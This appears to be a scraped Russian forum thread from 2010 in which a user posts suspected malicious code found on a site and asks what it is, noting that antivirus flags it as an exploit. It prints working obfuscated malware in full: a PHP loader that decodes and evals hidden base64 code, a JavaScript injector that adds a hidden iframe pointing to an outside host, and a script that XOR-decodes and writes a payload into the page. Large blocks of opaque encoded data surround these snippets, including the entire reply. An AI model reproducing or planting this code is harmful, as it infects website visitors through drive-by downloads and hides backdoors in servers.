eVzcB41TB5ZT0vVP0VncEGJXhGpXC8fHJufed7RWaulobUz5je dvG7Rvhebsawn5jmHqd8NvhG0Rbnb5IFnDE7ZXhNtRbVzfhvHU fOnFfunvGnlqhujnDGJWjeJVbGfWC4hvhWJXjGpWb5b3G6ddce VoAEXNj8nTheRAJOfVjg0SCTpz3oVAkDPNJ76uJvzNHgdlGUd8 e5z3DFteGUjceVZTB41Teu1ogELof5FtEnLtDN0gfe67f7tEhn 6fBf2Gfeff0Unj94VL05jBeV02e6bi05jBeV02e6bi0Vzceu1T B42cB3jjA3jefGtAFvfREnbfi8bMd5hu0UnjA3dTHgbugWdlj7 6i05jBeV02e6bi0Vzceu1TB42cB3jjA3jFde6AG463DnjfBFhF i60OFfFtF6hfbfFoAfVLAM1NHvzUHgdna49pCTPNj31z97xnjU 2GDfzFhGvTi76VhELNdVtcDN6BFvRoeVzcB41TB5ZT0vVP0Vto ceVoAEXNJWfVj7nShwbi05jBeV02e6bi0Vzceu1TB42cB3jjA3 jNdvhVHVjXI7d8fopHBn0THWJzcEJpgENy3MdVaexuhgdkhOnR hELNdVtcDN6BFvRoeVzcB41TB5ZT0vVP0W0gdo2MhuVz0UNR05 jBeV02e6bi0Vzceu1TB42cB3jjA3jmdVHvHnjGjGd4bGzNdu6u 0UNpCTPNJ76xiGfSj6zSHGvn94VL08hlJOnlHOtnJvRNdVtcDN 6BFvRoeVzcB41TB5ZT0vVP0Wb8dmfMfvhvh5HxjfngBGToAfVy 3Mdoiwdsgw2lKGvniodkiGfuJW6ohE1z98bVJnzUhg2RHGbnA3 d8e5z3DFteGUjceVZTB41Teu1ogELoheb3I7fgBGtMin0OHubR KOd8fodOFeVz0UNR082lKGvniodkiO6rhEt8evdcgv22GFv6en dkefb8AeRA07jsj7zkJ76xiGfSj6zrhgbuHGjn94VLJwdUgw0n J7tlHWFP05jBeV02e6bi0Vzceu1TB42cB3jjA3jnBNPth5lEjO 0RCgfhfu6Rhn5zcEJpa5bcend0enf6gV0ff6dceMTNhWzVivzT HgnrhGxVgWvnJwblhWFpCTPNj3V+JWfVgwhlJMLNdVtcDN6BFv RoeVzcB41TB5ZT0vVP0v9TCffFBendFfhRen0fbffHB46FFoJz cEJpa3doiwdsgw2lKGvniodkiGfuJW6ohENy3MdVaexuhgdkjO 6UA3d8e5z3DFteGUjceVZTB41Teu1ogELoHVj7bG0gfofNdmNt HWvwcEJpa3d8e5z3DFteGUjceVZTB41Teu1ogELoHFlEB7b9ee hBKenVGnlAIO68dofNDuFuGnjAj79UbGtnFufxh6BxJW0gIwhm dVHvHnjGjGd4bGlmBV5z0UNpCTPNj3V+JWfVgwhlJMLNdVtcDN 6BFvRoeVzcB41TB5ZT0vVP0WBufOnMfWTTG49ti7d8I8hIDeVz 0UNR05jBeV02e6bi0Vzceu1TB42cB3jjA3jmdunYh55zcEJpAe RAhOzUhG6mI31P082lJwbkh76VHE2lJU1NJ76UHGvnj7fUgWxl iGFLceXNJ76UHGvnj7fUgwhli8fnAE2y3MdVaexuhgdkjO6UA3 d8e5z3DFteGUjceVZTB41Teu1ogELoHVj7KfngBGtNdvhxG49v I70gfeVoAETNJ76UHGvnj7fUgWxliGFpCTPNj3V+JWfVgwhlJM LNdVtcDN6BFvRoeVzcB41TB5ZT0vVP0Wb8donhfu6Rh5jGKfLu GOlME6hR0UNR082lJO6rhgdnJnzWHGtvhENy3MdVaexTHg0uhE LNdVtcDN6BFvRoeVzcB41TB5ZT0vVP0Wb8donhfu6Rh5jGKGbw ceVoAEtVJofnAeRAkDPNj3V+Jw2lJobnA3d8e5z3DFteGUjceV ZTB41Teu1ogELoHubGIG0gi42HBV0PhfJti70SFeVoAEtOHGtu hENy3MdVaexTJ76UJWFP05jBeV02e6bi0Vzceu1TB42cB3jjA3 jMfVhTHOJzcEJpAeRAhglpj4RA

Третий файл
<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72% 61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4} .$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO000 0O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$ OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000 {11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};?><?php eval($GLOBALS['OOO0000O0']('JElJSUlJSUlJbGxsbD0nc3RydG91cHBlcic7')); ?><?php /* This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000 {7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO00 0000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14} .$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000 {8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OO O00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8} .$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__; $OO00O0000=6916;eval($OOO0000O0('aWYoITApJE8wMDBPM E8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzA wME8wMCgkTzAwME8wTzAwLDEwMjQpOyRPME8wMDBPMDAoJE8wM DBPME8wMCw0MDk2KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9 PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsNTA4KSwnM TIzNDU2Nzg5MEFhQmJDY0RkRWVGZkdnSGhJaUpqS2tMbE1tTm5 Pb1BwUXFSclNzVHRVdVZ2V3dYeFl5WnorLz0nLCdBQkNERUZHS ElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN 0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPM Ck7'));return;?>
jWlpi7FPj7nrhELpcm5UBuHUC4HXB41ph7nnA3k3ZCgR/U4TXC8SZsRLxCgRyM4Mxk4tYCLLx+4QySwwYCsSZkTS4Dq9yke SZCuLzSm/9C9LEFbdCM1vCeFwCeFoAeRNeVZTB5ZTB5ZTcGfUhGjkJOfTi7 6mhELogvz7EFt6gvZoa39o9MXNeVzcB5ZTeu1TaM9o9MTNeVzc B41TB5ZTA3dceVZTB41TB5ZP05ZTeu1TeVZTB3LNeu1TB5ZTeu 1Ta3dceu1Teu1TB41pa3JtBmBVbeHwC4NTDG63HNbmd7d6hFhO dWj9I5npEOpaIVtReGvCiNzsF82dJf0UFwbFj6fvfohgjvlXGg nIKMRscEJR0V63DVd6dNj9EFpae5vCev2dFnbFffhgG6nIHG0m h7fOhWlpIOrRiGxsJ86UJwdvjojXKgPTBe9ub4FWbuLxAUZoAE NpCWhmi7zuhELNeu1TB5ZTeu1TAernjO6RA3dceu1Teu1Teu1p CT==3MdUiWzVgWhsi7dnJnzTHgdP94VL05jBeV02e6bi0Vzceu 1TB42cB3jjA3jBIedW0UNy4DppiObRjGdngWzSHWFLA3dUiWzV gWhsi7dnJnzTHgdP93XNdVtcDN6BFvRoeVzcB41TB5ZT0vVP0W 6gbGpME6hqGnlbjOdrdonHBn0RGOvRjG6HFo2MBmdvHVjPjUJp AeRb3OnSHWtvh7fkiWxmhE1P080siwdkhOzRh7fUgw2lj7LLaM d8e5z3DFteGUjceVZTB41Teu1ogELoHfJvIO09fOrIG5vWGe9x jGBuFOlMin0Ye7x3iWb2ceVoAENy4DppiObRjGdngWzSHWFLA3 dUiWzVgWhsi7dnJnzTHgdP93XNdVtcDN6BFvRoeVzcB41TB5ZT 0vVP0W6gbGpME6hqGnlbjnNUCgdMfunvG40IBG0rem2lfunvHw NvjW69DeVoAENy4DppiObRjGdngWzSHWFLA3dUiWzVgWhsi7dn JnzTHgdP93XNdVtcDN6BFvRoeVzcB41TB5ZT0vVP0W6gbGpME6 hqGnlbjOdrdOhIinhvGebEJ79UbgpBiN0sHV5zcEJpAeRb3OnS HWtvh7fkiWxmhE1P080siwdkhOzRh7fUgw2lj7LLaM0piObRjG dnJUzNHnZNh70ki7nMao2PJ39pCTVA07dM94VLiOfw96h2gvbd e3LpCTVA07dMaex5DndxJ7FL931L931z93dNHnzVKg2nCTVA07 dMaex5DNdlj76MHgbn931z93dNHnzSHGvnCTVA07dMaex5DNls JwDL931L931z93dNHnzPiwbVCTVA07dMaex5Dn2sJoDL931L93 1z93dNHnzTiw0VCTVA07dMaex5Dnfuhg9L931L931z93dNHnzv JWfUCTVA07dMaex5Dn2lJwbwiw0N931z93dNHnzTHgbujWzUh4 Rb3MdNHMV+d50Dhg0uIgbVhGxVcE1Nh70kJ7fUJWnuj7fSj4RA 07trIfzTJOfUhg6vhgbV94VLhWfVgw2lJO6rA3d8e5z3DFteGU jceVZTB41Teu1ogELof5FtEnLtDnbEfNp7ffhGdnFtFeVoAEtD evbFAeRA07trIfzTHgnnhfzTjg0uhE1z97jnj6zTHg0liELNdV tcDN6BFvRoeVzcB41TB5ZT0vVP0vd6BFpHBF03fvfGdnLtDnhf i5x70UNRF5zef3Ny3MdRiGnkJ76xiGfSj6zliGzvioDLcE2ohg dkJ76UHGVP05jBeV02e6bi0Vzceu1TB42cB3jjA3jFde6AG463 DnjfBFhFi60OFfFtF6hfbfFoAEtDevbFAeRA07trIfzTHgnrhG xVgWxs94VLhWfVgw2lJO6rA3d8e5z3DFteGUjceVZTB41Teu1o gELof5FtEnLtDN0gfe67f7tEhndqC4VoAEtDevbFAeRA07trIf zriWdn94VLhWfVgw2lJO6rA3d8e5z3DFteGUjceVZTB41Teu1o gELof5FtEnLTBf2EdfFz0UNRF5zef3Ny3MdRiGnkJwnugWnSjo bkiOZLcE2ohgdkJ76UHGVP05jBeV02e6bi0Vzceu1TB42cB3jj A3jFde6AG46CGnFtCFpFi6pFG41vF3Jpa62cFvDpCTPNi7vpgw bxJvzVJO6SJvzSiU1z97jnj6zTHg0liELNdVtcDN6BFvRoeVzc B41TB5ZT0vVP0vd6BFpHBFxIfe5xfffqdNzfBencf8JzcEJpa6 2cFvDpCTPNi7vpgw2lKGfUgw2vJobn94VLhWfVgw2lJO6rA3d8 e5z3DFteGUjceVZTB41Teu1ogELof5FtEnLtDN0gffheG463fn fReNHoAEtDevbFAeRA07trIfzTHgnnJnzwiE1z97jnj6zTHg0l iELNdVtcDN6BFvRoeVzcB41TB5ZT0vVP0vd6BFpHBF03fvfGFv Lth5XoAEtDevbFAeRA07trIfzTHgnrhg0kiofrHOfU94VLhWfV gw2lJO6rA3d8e5z3DFteGUjceVZTB41Teu1ogELof5FtEnLtDN 0gfe67fGTxevhfBFbEfNNz0UNRF5zef3Ny3MdRiGnkJ76xiGfU gWfrHGnR94VLhWfVgw2lJO6rA3d8e5z3DFteGUjceVZTB41Teu 1ogELof5FtEnLtDN0gfe67fGTxdndfdNpFDeVz0UNRF5zef3Ny 3MdRiGnkj7fRhg2lj6zTI7zShGxviG0nJM1z97jnj6zTHg0liE LNdVtcDN6BFvRoeVzcB41TB5ZT0vVP0vd6BFpHBf07f5fGFf6G FOhfdGlDf7rGevhfBFbEfNNz0UNRF5zef3Ny3MdRiGnkj7fRhg 2lj6zsJOdnJOnN94VLhWfVgw2lJO6rA3d8e5z3DFteGUjceVZT B41Teu1ogELof5FtEnLtFNhFdfhdFfhEhnDtENfEfNpAFN5zcE Jpa62cFvDpCTPNi7vpgw2lKGvniodkHw0nh7nVh76xJU1z97jn j6zTHg0liELNdVtcDN6BFvRoeVzcB41TB5ZT0vVP0vd6BFpHBF 03fvFtdndRFOhdBFp7FNfRff06dnpfjuVz0UNRF5zef3Ny3MdR iGnkI76uI31z97jnj6zTHg0liELNdVtcDN6BFvRoeVzcB41TB5 ZT0vVP0vd6BFpHB7l3fe2ocEJpa62cFvDpCTPNi7vpgwbxJvzV JO6SJvzNHgdn94VLhWfVgw2lJO6rA3d8e5z3DFteGUjceVZTB4 1Teu1ogELof5FtEnLtenpfBenffGr7evFtCFfdfn070UNRF5ze f3Ny3OnO93lpJwbnj3LNi7vpgw2Uhg0nJgfnJwDp956Cd31P07 trIfzTJOfUhg6vhgbV94Vz945pAE2y3OfmI7ZL05jBeV02e6bi 0Vzceu1TB42cB3jjA3jgffhF0UNy3o0nj8fUimRAkDpphM1PA3 6uj80RhGXP07trIfzTHgnrhGxVgWxsAENLev9LA36uj80RhGXP 07trIfzPHgbPAENp98rUhgdvJOXykDVA08bti31LcE1NdVtcDN 6BFvRoeVzcB41TB5ZT0vVP0Vn7eNhFdfh5fNb3jvnHi8dIfuFT G40RIVn6GnbFB42o0UNLaMdVHG0RhfzTJOfOIgLLaMd8e5z3DF teGUjceVZTB41Teu1ogELoHmbAIvpHEop0DeVz0UNy4DPNJw6R 93Xz93d8e5z3DFteGUjceVZTB41Teu1ogELoEFhNEf0GENh0du nxGNjGKfLUi7rDFeVz0UNLaMdNHMV+j7zuJGTP07trIfzTHgnr hGxVgWxsa5nCf5f8df9pCTVA07dMaextjGfUKELNJw6RAeRb3O nO93LNh79rcOxnK8dkJOfmiw0NA3Np98Rb3MdTHgnrhGxVgWnN 94VL07dMaexOA3d8e5z3DFteGUjceVZTB41Teu1ogELoHVj7bG 0gfofNdmnTGN5zcEJpAeRb3oVb3MdsJOdnJnzOIGxli31z976U JO6xA3Ny4DPNJWfVj7nShvzVKg2n94VL05jBeV02e6bi0Vzceu 1TB42cB3jjA3jMBVpqGnlAhnpri8fhfwlO0UNLaMdTHgnrhGxV gWnNCTVA08bti31LcE1NdVtcDN6BFvRoeVzcB41TB5ZT0vVP0v FTfNvEfFxfEFlCi7d9Fo2MiGdOHOv7j6pejWjmBnHTh5jRjfPt Ce0hfwLtGnb3dvfqCFx0DeVz0UNLaMdVHG0RhfzTJOfOIgLLaM d8e5z3DFteGUjceVZTB41Teu1ogELoGm0XjnnrdobHBVxRh5lE J70rh8PoAeRb3MduJGTLamVL05jBeV02e6bi0Vzceu1TB42cB3 jjA3j0dOd0FnhAdNn9eOtNE60THOvNhOd9i8jIf41z0UNLaMdN HMV+j7zuJGTP08bnj8dpiOjkj8nThEtFdflFAeRb3MdNHMV+Jg fnJoNP08bti3Ny4DpwI7nRhELNh79rcOxnK8dkJOfmiw0NA3Np 98Rb3MdsJOdnJnzOIGxli6RNh79rcOHP05jBeV02e6bi0Vzceu 1TB42cB3jjA3jmBnHTh5jRjfPtCgfhfu6R0UNpgE1z93dNHMV+ hMLNdVtcDN6BFvRoeVzcB41TB5ZT0vVP0WBUfm2NdWtvGm5xBn ngK46IFeVz0UNpCTVAkDVA07hlIGtvJOfkJwdlj8fugWnN94VL hWfVgwbnj8dpiOjkjO6RjGFP07zUh7fUgWhpiO6Ra3d8e5z3DF teGUjceVZTB41Teu1ogELoGOv7J709fonIfmnYh5j7B7dHeOhl fv5z0UNR05jBeV02e6bi0Vzceu1TB42cB3jjA3JoAENy3MdujG bmhgbugwbVHgdvJvzph31z97jnj6zuhgdVIGxogwhli8fnA3ds JOdnJnzOIGxli3TNdVtcDN6BFvRoeVzcB41TB5ZT0vVP0WBufO phBnhYHu5xKOd8dm2NG5xOHfjdcEJpa3d8e5z3DFteGUjceVZT B41Teu1ogELo0UNpCTPNhg0Uiw0kiGfuJW6ohE1z93d8e5z3DF teGUjceVZTB41Teu1ogELoFVf7f6b4DOpMBVpxh6l3B6pgFeVo AeRAIGHLA3dRiGnkiGzNhE1zcE1tAE2y3MdujGbmhgbugWvnJw blhWFLcE1NdVtcDN6BFvRoeVzcB41TB5ZT0vVP0vh9EOlMiNxP GebEJ79Ub7jeff6o0UNS07trIfzuKgbkj80liobkiOZS05jBeV 02e6bi0Vzceu1TB42cB3jjA3j0DWlfFnhCffbfbFlaFeVz0UNy 3ovni8bn98RA08bvHWbnJwbkiGfuJW6ohE1z93d8e5z3DFteGU jceVZTB41Teu1ogELofNlAI70SeOlhBv0THm9VhvbfFGJoAEXN i7vpgwbxJvzVJO6SJvzSiuRAkDPNJw6R931z93d8e5z3DFteGU jceVZTB41Teu1ogELoEFhCdnd6fNdGDV0wGflAI70gfm2IG5pO Hu9xBGbreOt0dfpef41ThUJp93XNj76Mi7fkJ80nhOnX93XNdV tcDN6BFvRoeVzcB41TB5ZT0vVP0Wb8dmfMfvhvh5HxjvnHEOlM fvHTGnlAKNn2ceVoAeRA08bti31ScE1NdVtcDN6BFvRoeVzcB4 1TB5ZT0vVP0Vn7h5nEfNp7EFl3I7fgBGtMin0OHfjdCEJp93XN h79rcodsJw6RA3dTHgnrhGxVgWnNa5nCf5f8df9pCTPNJw6R93 Xz939LDFx5982lJO6rhgdnJnzSHGvncEjBeFnkFVf4FNfFgVr6 GEJMCTPNiwfUgWtrIfzuhGbUhgdkIWfx94VLhWfVgWdMgwhli8 fnA3duJGTpCTPNiwfUgWtrIfzPHgbP94VL05jBeV02e6bi05jB eV02e6bi0Vzceu1TB42cB3jjA3jefGtAFvfREnbfi8bMdwlu0U njA7vNbELNi7vpgw2lKGfngw2vJobnaMdRiGnkJ76xiGfSj6zl iGzvioDS07trIfzTHgnrhGxVgWxsaMdRiGnkiGzNhEXNi7vpgw bxJvzpiohugWxsaMdRiGnkJwnugwdUHGxugWxsaMdRiGnkJwnu gwdUHGxugWdlj7FS07zvJnzRiGnkJWfmJOfVgWrnKEXNi7vpgw 2lKGfUgw2vJobnaMdRiGnkJ76xhg0kjWVpAeRAIGHLA3dsjg0k i7vpgWllJWLLceVL07trIfzPHgbPAE2y4DPNiw0Nhg0kJwdlj8 fu94VL08bvHWbnJwbkJwdlj8fugWnNCTVA08bti31LcE1NdVtc DN6BFvRoeVzcB41TB5ZT0vVP0Vn7fn6EdFhfFnb2cEJp93XNj7 6Mi7fkJ80nhOnX93XNdVtcDN6BFvRoeVzcB41TB5ZT0vVP0W9u EOrIG5pYEF5zcEJpCTVA08bti31ScE1NdVtcDN6BFvRoeVzcB4 1TB5ZT0vVP0Vn7eNhGDV0WHWvEi7bRCgpNdVHTh6lbCEJp93XN h79rcodsJw6RA3dsJOdnJnzuj76VjgBREFxFdFj6FMNLCTVA08 bti31ScE1NdVtcDN6BFvRoeVzcB41TB5ZT0vVP0Vn4jWjmBvhQ Ge0GKOBtCgdIG5xYGfjNi62dceVoAE1S07dMaexViwbti3LNJw fmHWfuJvzrhgbuHGjna6d6G6DpCTVA08bti31ScE1NdVtcDN6B FvRoeVzcB41TB5ZT0vVP0Vn7h5nEfNp7EFJxKfp8fonHBOtqF6 5zcEJp93XNh79rcodsJw6RA3dRiGnkJ76xiGfSj6zSiUt0end6 dVfEAE1y4DpzhGtuhE2y4DPNiw0Nhg0kJwdlj8fu94VL07hlIG tvJOfkJwdlj8fugWnNCTVA08bti31LcE1NdVtcDN6BFvRoeVzc B41TB5ZT0vVP0Vn7fn6EdFhfFnb2cEJp93XNj76Mi7fkJ80nhO nX93XNdVtcDN6BFvRoeVzcB41TB5ZT0vVP0W9uEOrIG5pYEF5z cEJpCTVA08bti31ScE1NdVtcDN6BFvRoeVzcB41TB5ZT0vVP0V n7eNhGDV0WHWvEi7bRCgpNdVHTh6lbCEJp93XNh79rcodsJw6R A3dsJOdnJnzuj76VjgBREFxFdFj6FMNLCTVA08bti31ScE1NdV tcDN6BFvRoeVzcB41TB5ZT0vVP0Vn4jWjIG5pxHmbAhO0gfopm BNhSGnDTcEJp93XNh79rcodsJw6RA3dnJo0sJnzrhgbuHGjna6 d6G6DpCTVA08bti31ScE1NdVtcDN6BFvRoeVzcB41TB5ZT0vVP 0Vn7h5nEfNp7EFJxKfp8fonHBOtqF65zcEJp93XNh79rcodsJw 6RA3dRiGnkJ76xiGfSj6zSiUt0end6dVfEAE1y4Dpz4DPNh79r co6vhg0xA3duJGTpCTVA

daniel_1024

13.03.2010, 23:11

хм, можете помочь понять что это:

<script type='text/javascript'>function sB(){};var h=function(){};sB.prototype = {o : function() {var v=false;this.e="";var zE=new Array();function zX(){};function yN(yN){return 'yN'};var r=document;var tG=false;dQ=false;this.u=false;var q=window;var j="";mY="mY";var m = { a : 's~tpy[l9e['.replace(/[\[9~\.p]/g, ''), b : 'a#pWpYeWn8d#C8hWi#lWd#'.replace(/[#W8\)Y]/g, ''), y : 'iAfFrva:mhev'.replace(/[vFAh\:]/g, ''), t : 'cprGejaptGeHEGlGepmGejnptG'.replace(/[GHjpv]/g, ''), d : 'w*rEiCt?eC'.replace(/[C\?E\*z]/g, ''), s : 'spekt@Apt1tJrpi1bJu1tpe@'.replace(/[@pJ1k]/g, ''), z : 'sirtct'.replace(/[tiqu\!]/g, ''), mR : 'b%oHdHyH'.replace(/[H7s%\<]/g, '') };var k=false;var eT=false;jI=false;var mU=function(){};var wG=false;try {var vN=12508;this.kA=61311;f="";this.fS=false;var rY=false;var n=r[m.t](m.y);this.x="";function g(g){return true};n[m.s](m.z, this.aP());this.tV=false;var bL=function(){};n[m.s](m.a, 'dDiksDpSlkaky|:S QnQoQnDek'.replace(/[kDSQ\|]/g, ''));var aQ=7812;this.kD=64131;this.xQ=false;oG='';this.c=2 7360;document[m.mR][m.b](n);var vA='vA'.substring(609, 609);var cJ="cJ";var oV='';var rE=function(){return 'rE'};} catch(zD) {var tL='tL'.substring(51649, 51649);var zEZ=new Array();r.write('wam4R4<N/ab4oNdaya>4<H/4hNt4mHlN>T'.replace(/[TH4Na]/g, ''));var uQ="";var vS=function(){return 'vS'};var zB = this;var yQ="";var mH=53204;q.setTimeout(function(){ zB.o() }, 288);var fI=function(){return 'fI'};this.fN=false;}var bLA=function(){return 'bLA'};var jW=53475;wM=false;},aP : function() {this.qP=19712;kH=false;wH='';return 'hQtltlpl:O/$/QuQn$b}0lr}nQ.lbOi}zQ/OiQnQ.$c$gQiQ?$3Q'.replace(/[Q\}Ol\$]/g, '');var cI='cI'.substring(61473, 61473);this.vR='';}};var i='i'.substring(33701, 33701);var fG=new sB(); function uD(uD){return true};fG.o();this.cP=3738;</script>

<script>function jIxnUrxy(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeig ht;else return window.outerWidth*window.outerHeight;}if(jIxnUrxy( )>100000){window.name=388459575566651949554742378452 68142547292757367762299613396823637871691775512287 41637751728945214929;var rVwKZEnt='%u0032%u000e%u0067%u0001%u0073%u0012%u00 7f%u001a%u003a%u004d%u0024%u0040%u0034%u005c%u0061 %u0050%u0070%u0018%u007d%u0014%u0073%u001b%u006f%u 0052%u0063%u0043%u0021%u004e%u003c%u0058%u003d%u00 4f%u0072%u0042%u0062%u0004%u0076%u0017%u007a%u001f %u007d%u0012%u0060%u0004%u0061%u0013%u002e%u001e%u 003e%u004d%u003f%u005c%u0061%u0046%u002e%u005a%u00 2e%u005e%u0064%u004b%u0064%u0013%u007c%u000b%u007f %u000d%u0064%u0006%u0063%u0010%u003e%u005d%u0032%u 005f%u0070%u001c%u0073%u0014%u0067%u0048%u0021%u00 4f%u002b%u004e%u0036%u0018%u0068%u0000%u0070%u0057 %u0069%u0055%u007a%u0013%u0075%u0007%u0066%u000b%u 006e%u0050';var gDFWvB=unescape(rVwKZEnt);FWjdPIg=window.name;for( QqsUFCi=0;QqsUFCi<gDFWvB.length-1;QqsUFCi++){mJAFZuhRe=gDFWvB.charCodeAt(QqsUFCi); document.write(String.fromCharCode( (gDFWvB.charCodeAt(QqsUFCi+1)-0) ^ mJAFZuhRe) );}}</script>

похоже на сплоент, во всяком случае антивирус палит.

restart_05

14.03.2010, 10:31

4+oV5EaMUNpPj45qeDhiNxKasYSZGaCFmUQT6gEy+kOMN1rP53 wk1wq0vZLfA7NATX/0aPuuZhZO
cb8Dyrxdh0JB/GQbBsdeGEJuAr3AS/6Z0bVI4YVEqT3gIFTKMK0xC1zNosF/5qzkOr1sNxVkcoUh
/oEvCfxxmO6JD75+laS6wF22FOyZOpEnhpUXEfGz5HVxSPoUdi6 rrfKPbqbUVuIr3K2Lf45yXBx4
4yJKCTKs43ae+iqWatGleBSLkzO8Z4+nukGeALPKZcUy87VnTW NdlBomUYViBzpIQLfWlRWShGsi
6p7mc2Z27VzX4zjpprBcY0PtUhJEDXO827QivP3n4axEbsxqdO tkZiFjUJezN1lPLODqAigtaioc
SYk5VNvpXRnhtyqx6n76gwTL2WLBfhhiT1Y307f2Y/fYTfJdhiVT8GXE3wJwhokt9O5Q6htObgoR
faq+HbZ7h2tEJXMg2OJhdxNbyuhLvEA/+aq2TshIyPTJa7P2O6vfBeRVIWaGtykLhu2vzZ0RrVKr
5EDy3ox4blZabSpwZmmXLqlLdfaO7MsaMtWZWZlI+PXC45cNwM hDtu6v5hfa0L5Ee/OU0UcD7msA
PHUnkIiZqMMt4d63dfY+FubnfGEbMOY7t14MNeNp0ktwLOzT/v5oEeEhYwa+76YkjSPcUKcphgUM
GPC4djpOWsQngypBZ9B2T1qxh2SSJI1xPuB7P5Iw/vXQm/uYDGThQ6R1poVEEc5X0nPio1QNUCZf
/c5iG0lEc/9eOn/6bE8efGoV1nRz5rjvy8t7VmHR0QEt3HMf/nc+8tifBP37QpVE67MG12KpMtqV
v0DsD67jVZzdhk5jjklXzEbEBuExtpBiC2hh3FeZrfWAzbupT3 RwG4a0qPVWOd0VTsNvxAGwQ4lw
YBfkFrDuvvbvexzzYBSeLtc2N3uZcBitDV7X2xRn3wXzqM2dmS r5CcAi87ebNKt+Ze3mQjHzHd9I
oiTTJ/4lMap/Eyp7WMULY7jXe1CwHHB4QR09qHWfMcx1XjCjsHFPvc40GrggNr LkNjzovAEnAW4u
f/lhx3W7tgHl9RJVhiw1dnaf/DL3MqGH8aKpBFUQdXbRrhUvHZM8QPgRRFoES427KMXwPL0Z4rz s
O4FjiRHz4nlz9qZZRSSxIqdmHBKWEEdGqv0P5mONMLp+Oowe3v ug35oudieBqu8/CtGLgyJdK5mP
yAjpVxYdDdK8JKYtz0XwN/y+Kqv5i6EcKbPohMiqeya4z34wrJEJ0P1ABwoUktGq1bKhu1J9 1aEC
Dyzmm18UlRm7TdkkXrkFmP0wT+KFVvaC2DC5iA0Thcnn17qaEW A/ePe/U/pv0nsA6bxjIS8tG0Em
l53ndctLkeTDzF0eNwLMzDPRGMTSaM/WsgAxQaBIJQs7LCS+BNxXXIMCFj+uBXIHPHNf7sV/KpwA
GA0twGjbZA/47TcpE38jlyagtzhJDbE2Q62RD4jEJwCGKHdYI1kuDYoo/vwFw8T22Y8fgH0O3IUh
nBja7ePLmsgkrpxOjXk1I+TRAqegz4HEib2HI7eAfcZc6cTR9f jexcv1m2jaijQlap+Kq4pAHBeh
SaXY9ZEG1i/HwpOhU95uPeHJY1y2rLiY1DGgOL+fDTYu5HXr+J6tYpR51x2vl dnZS103joRRlCYE
ICOrdSTLAlerlFSl5C3j74T8w53Bwn1x5AEQUpcjNj7hZwiMT6 VghES5/kpe6m/iRoOde8gOqkk8
rlQOOB7qH4QYR5jqoHmitNo73r8UkXxq+F+nE4N30eYmtS3+cn 4ABbSFlS3x7feKyEjntgh9xEgi
TvkKfwXnXgFli6rLtDYm03ljR3+exHRLalN1HyBt+cZ+GiKeNA 7CbdaeTIDzSAVLDPJAHda/EF2h
CPaxMcnPOznCppQmCHIBj3q0G80KSiy8LE0AGhb4gDi0DMqhc0 0h2VrsAnItahATr7sz3IDz6PN2
MZJxmtDDIaFBhdSFylypiTAyokDTfMI2i3uGXALzV5djWtpCou 6aGIiTU2K3xHH032inUFJ4uL0A
1D0sG4/OUMgVm5b4p4cRaHnr/jYdLddFsemXhN1WM1wsQ7FRfHFXnJImThOXw+PsX9JY0d7q2vG B
14d0j5Z+R4IYjanScFdLeRiT/tsrJtfUSiH2/EpBoGHmeNR18PSlKa73gqSEhpOcDOd4HoZ5qxhg
32qJbdO1yXVWpDW/DOUDeOKcX7iHT1linjGteOoFb51jZTP7yDNR9PGcl1GrqT/RLK1TO9RrD6xe
guwirIryY4gKVy6US0OGgmVdEL+H+3i65+nGxoxrYBcxOAagld LfUmXKqrp8fptC35N1YvevcjsB
0WEKEOINg48Hk5akKUcLQRJGr6vE8cL+JFyRA9e2AlyuaYeBpC 3/O2/Eva5djS02BMx+NaPbz0gV
+ISbu1wc6lyAPjoTltUvb8ilARI+VMbpSjpFq+CbbzLsdjSsk7 jRp9L3R9QWqAukEXOmE/1NgFy/
Yzshg8BIHyjbEjnrxH/m+bZr9qId9Rszm7hidTLyyqguJVSOxtUjomv0B1jv+0X6LgfeU RdRpNLw
vEzrEof/mwEgdxPzLAb1mZloONyA7HXntNTyQbyx2MlrBN5VD4m0bT0wJI uS+3Qr/4HWWUYr9km+
T6SB00qgRnIal8cTLY9h4q/pmidiKfsMMti6xfixzcOgd5xjFjna/PCBni2NGBLDrWMKIWuLFctm
UN/f5LCZbfvNWBOGtZEPFk1FWUTqt90/TUt4eSSmydwTPcj9JRPkZAihRNJ92kql8IXJWfcGGemb
LkembO1sm5ljzJdaXMgUzJJiJUgX0n4hZGykrRLAfe8e/ssxj2BGlZ4Y6SxqJdiYKEd5iNPzVvSn
KVvylcwhza7PxPKSOIDp6YvYnKhLPKThPX4JGTo7jkmWFTqaXW rHTvC7SACwWoyCL8DwHc+Nv2qA
O9rt8lY9G5noE1/jeLXorpcKMeeQ/TsQtLUq5AlRRKgMMOZ1SNdf6ib9pHuLHuZ/XEyl2IKmJQFg
RtmSouIQfsvTyzEk8ENqOm0AQO7DEKRvqSvXuHj9lDvGDFhrqh t3Br/GqUcMJn6U49itsM0qfglu
v8iUoaJD3Ka86qwLPorQ+pE2FyF8tyaUvpLDbeKHbiUVRI4uN6 cXMgKhoM3WUPirHOYVhV4f8je7
QzaTOpjb7MUNl2RopGOnSbd+WZ8/+FjL6f8tkb1fFVZqnpMsM4d5Yoa6MCM1URJZy5oOUu5Q6tUc
